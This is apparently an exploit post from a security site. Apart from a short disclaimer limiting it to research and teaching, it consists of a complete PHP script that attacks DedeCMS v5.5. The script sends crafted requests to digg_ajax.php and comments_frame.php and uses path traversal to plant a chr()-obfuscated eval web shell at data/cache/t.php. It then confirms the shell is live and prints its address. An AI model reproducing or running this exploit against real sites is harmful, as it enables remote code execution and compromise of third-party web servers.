dedecms v5.5 final getwebshell exploit(datalistcp.class.php)

测试方法:

@Sebug.net   dis
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

1. <?php
2. print_r('
3. +----------------------------------------+
4. dedecms v5.5 final getwebshell exploit
5. +----------------------------------------+
6. ');
7. if($argc <3){
8. print_r('
9. +----------------------------------------+
10. Usage: php '.$argv[0].' host path
11. host: target server (ip/hostname)
12. path: path to dedecms
13. Example:
14. php '.$argv[0].' localhost /dedecms/
15. +----------------------------------------+
16. ');
17. exit;
18. }
19. error_reporting(7);
20. ini_set('max_execution_time',0);
22. $host = $argv[1];
23. $path = $argv[2];
25. $post_a ='plus/digg_ajax.php?id=1024e1024&*/fputs(fopen(chr(46).chr(46).chr(47).chr(100).chr(97).chr(116).chr(97).chr(47).chr(99).chr(97).chr(99).chr(104).chr(101).chr(47).chr(116).chr(46).chr(112).chr(104).chr(112),chr(119).chr(43)),chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(39).chr(120).chr(39).chr(93).chr(41).chr(59).chr(63).chr(62));/*';
26. $post_b ='needCode=aa/../../../data/mysql_error_trace';
27. $shell ='data/cache/t.php';
29. get_send($post_a);
30. post_send('plus/comments_frame.php',$post_b);
31. $content = post_send($shell,'t=echo tojen;');
33. if(substr($content,9,3)=='200'){
34. echo "\nShell Address is:".$host.$path.$shell;
35. }else{
36. echo "\nError.";
37. }
38. function get_send($url){
39. global $host, $path;
40. $message ="GET ".$path."$url HTTP/1.1\r\n";
41. $message .="Accept: */*\r\n";
42. $message .="Referer: http://$host$path\r\n";
43. $message .="Accept-Language: zh-cn\r\n";
44. $message .="Content-Type: application/x-www-form-urlencoded\r\n";
45. $message .="User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
46. $message .="Host: $host\r\n";
47. $message .="Connection: Close\r\n\r\n";
48. $fp = fsockopen($host,80);
49. if(!$fp){
50. echo "\nConnect to host Error";
51. }
52. fputs($fp, $message);
54. $back ='';
56. while(!feof($fp))
57. $back .= fread($fp,1024);
58. fclose($fp);
59. return $back;
61. }
62. function post_send($url,$cmd){
64. global $host, $path;
65. $message ="POST ".$path."$url HTTP/1.1\r\n";
66. $message .="Accept: */*\r\n";
67. $message .="Referer: http://$host$path\r\n";
68. $message .="Accept-Language: zh-cn\r\n";
69. $message .="Content-Type: application/x-www-form-urlencoded\r\n";
70. $message .="User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
71. $message .="Host: $host\r\n";
72. $message .="Content-Length: ".strlen($cmd)."\r\n";
73. $message .="Connection: Close\r\n\r\n";
74. $message .= $cmd;
75. $fp = fsockopen($host,80);
76. if(!$fp){
77. echo "\nConnect to host Error";
78. }
79. fputs($fp, $message);
81. $back ='';
83. while(!feof($fp))
84. $back .= fread($fp,1024);
85. fclose($fp);
86. return $back;
87. }
88. ?>